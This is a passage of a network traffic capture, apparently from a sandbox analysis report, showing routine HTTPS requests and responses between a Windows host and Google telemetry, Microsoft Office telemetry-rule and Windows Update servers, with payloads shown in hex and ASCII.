2024-11-13 19:39:33 UTC	942	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=519=OvPZ7i6Nq8QbydlW5DZQ3Qyzz6RZYqahf4yiJ3Jb6SyT02kh6CQ7liL2NPCyXNRjbzGuWhR6cX4nIXO2SzmjxNO6sw_vZ37jvuQY-kHwMAXteHCpkQnlL9hn8zxTAeyQvxRxAk2f32KBycAgBlGpLdjrIRRbIkpN5LkiZKQ3gQwCVogbjKZkeeAp; expires=Thu, 15-May-2025 19:39:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Wed, 13 Nov 2024 19:39:33 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Wed, 13 Nov 2024 19:39:33 GMT Connection: close Transfer-Encoding: chunked
2024-11-13 19:39:33 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-11-13 19:39:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.5	49797	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:33 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:33 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:33 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: cd5b73c9-701e-0098-1e09-2d395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193933Z-16547b76f7fr28cchC1DFWnuws0000000hk000000000zrrd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-13 19:39:33 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.5	49800	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:33 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:33 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:33 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 29e284b5-001e-0065-5703-2d0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193933Z-16547b76f7fdtmzhhC1DFW6zhc00000006cg00000000t4vs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:33 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.5	49799	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:33 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:33 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:33 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: f41de97c-601e-005c-1654-35f06f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193933Z-1749fc9bdbdjznvchC1DFWx4dc00000001cg000000006dy2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:33 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.5	49801	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:33 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:33 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:33 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: f716b4a5-801e-008c-7dac-347130000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193933Z-r178fb8d765cgqv6hC1DFWsdr400000001c000000000vq6q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:33 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.5	49806	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:34 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:34 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:34 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 96a6b3aa-501e-008f-53a1-349054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193934Z-r178fb8d765hbcjvhC1DFW50zc00000001g000000000d6f4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:34 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.5	49807	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:34 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:34 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:34 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: ba8c429a-801e-0047-0ea2-347265000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193934Z-r178fb8d7654njfdhC1DFWd04800000001a000000000wpnu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:34 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.5	49809	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:34 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:34 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:34 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 5110c4ae-601e-0050-54a6-342c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193934Z-r178fb8d765n474shC1DFWge7g00000001f000000000fswe x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:34 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.5	49808	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:34 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:34 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:34 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 1572e0e4-b01e-003e-1a0c-2d8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193934Z-16547b76f7f67wxlhC1DFWah9w0000000hh000000000ndr2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-13 19:39:34 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	49805	4.245.163.56	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:34 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=GE8uW+ePrTFbte8&MD=dYbVHGlU HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-13 19:39:35 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 8600a7b6-cffd-46fc-addf-570de7da8a9d MS-RequestId: d6df56fa-cb74-4cf1-80cd-8aae8c5da1b3 MS-CV: b+ABzq9HpUCXBqXx.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 19:39:34 GMT Connection: close Content-Length: 24490
2024-11-13 19:39:35 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-13 19:39:35 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.5	49810	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:34 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:34 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:34 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: d55876ee-301e-0099-5603-2d6683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193934Z-16547b76f7f9bs6dhC1DFWt3rg0000000hp0000000002251 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:34 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	49811	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:34 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
